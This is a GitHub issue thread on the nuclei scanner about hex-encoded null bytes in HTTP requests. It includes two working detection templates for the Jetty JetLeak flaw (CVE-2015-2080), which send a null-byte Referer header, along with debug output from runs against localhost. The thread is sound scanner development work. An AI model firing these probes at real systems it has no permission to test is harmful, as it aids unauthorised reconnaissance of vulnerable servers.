search

projectdiscovery / nuclei

Fast and customizable vulnerability scanner based on simple YAML based DSL.
https://docs.projectdiscovery.io/tools/nuclei
MIT License
20.09k stars 2.46k forks source link

Interpret hex encoded strings when parsing http requests #5268

Open tarunKoyalwar opened 3 months ago

tarunKoyalwar commented 3 months ago

Nuclei version:

main | latest

Current Behavior:

template https://cloud.projectdiscovery.io/public/CVE-2015-2080 is not working because the null byte in hex encoded format \x00 is being treated as a string instead of actual null byte , this seems to be happening with both simple http and raw http requests . While one way to fix this is write template in javascript but it introduces another set of challenges i.e we should add a utility to interpret hex encoded data in strings

Expected Behavior:

working template

Steps To Reproduce:

Anything else:

tarunKoyalwar commented 3 months ago

looks like we can already achieve this using dsl helper function but for some reason this doesn't work

id: CVE-2015-2080

info:
  name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage
  author: pikpikcu
  severity: high
  description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
  remediation: |
    Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability.
  reference:
    - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
    - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
    - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2080
    - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-2080
    cwe-id: CWE-200
    epss-score: 0.95465
    epss-percentile: 0.99329
    cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fedoraproject
    product: fedora
  tags: cve2015,cve,jetty,packetstorm,fedoraproject

http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Referer: {{hex_decode("00")}}
        Connection: close

    matchers-condition: and
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Illegal character 0x0 in state"

      - type: status
        status:
          - 400
nuclei -t a.yaml -u http://localhost:8080 -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.8

        projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.2.8 (latest)
[INF] Current nuclei-templates version: v9.8.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 62
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2015-2080] Dumped HTTP request for http://localhost:8080/

POST / HTTP/1.1
Host: localhost:8080
Referer: 
Connection: close

[VER] [CVE-2015-2080] Sent HTTP request to http://localhost:8080/
[DBG] [CVE-2015-2080] Dumped HTTP response http://localhost:8080/

HTTP/1.1 400 Illegal character 0x0
Connection: close
Server: Jetty(9.2.30.v20200428)
Content-Length: 0

[INF] No results found. Better luck next time!

but this works

id: CVE-2015-2080

info:
  name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage
  author: pikpikcu
  severity: high
  description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
  remediation: |
    Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability.
  reference:
    - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
    - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
    - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2080
    - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-2080
    cwe-id: CWE-200
    epss-score: 0.95465
    epss-percentile: 0.99329
    cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fedoraproject
    product: fedora
  tags: cve2015,cve,jetty,packetstorm,fedoraproject

javascript:
  - code: |
      let m = require('nuclei/net');
      let address=Host+':'+Port;
      let conn = m.Open('tcp', address);
      conn.Send('GET / HTTP/1.1\r\nHost: '+address+'\r\n');
      conn.Send('Referer: ');
      conn.SendHex('00'); // null byte
      conn.Send('\r\nConnection: close\r\n\r\n');
      resp = conn.RecvString();

    args:
      Host: "{{Host}}"
      Port: '8080' # hardcoded port

    matchers-condition: and
    matchers:
      - type: dsl
        dsl: 
          - 'contains(response, "Illegal character 0x0 in state")'
          - 'contains(response, "HTTP/1.1 400")'

    extractors:
      - type: dsl
        dsl:
          - response
nuclei -t b.yaml -u http://localhost:8080 -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.8

        projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.2.8 (latest)
[INF] Current nuclei-templates version: v9.8.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 62
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2015-2080] Sent Javascript request to localhost:8080
[DBG] [CVE-2015-2080] Dumped Javascript request for localhost:8080:
Variables:
    1. Host => localhost
    2. Port => 8080 address=localhost:8080
[DBG]  [CVE-2015-2080] Javascript Code:

    let m = require('nuclei/net');
    let address = Host + ':' + Port;
    let conn = m.Open('tcp', address);
    conn.Send('GET / HTTP/1.1\r\nHost: ' + address + '\r\n');
    conn.Send('Referer: ');
    conn.SendHex('00'); // null byte
    conn.Send('\r\nConnection: close\r\n\r\n');
    resp = conn.RecvString();

[DBG] [CVE-2015-2080] Dumped Javascript response for localhost:8080:
    1. response => HTTP/1.1 400 Illegal char .... tty(9.2.30.v20200428)    
    2. success => true address=localhost:8080
[CVE-2015-2080:dsl-1] [javascript] [high] localhost:8080 ["HTTP/1.1 400 Illegal character 0x0\r\nContent-Length: 0\r\nConnection: close\r\nServer: Jetty(9.2.30.v20200428)"]

cc: @ehsandeep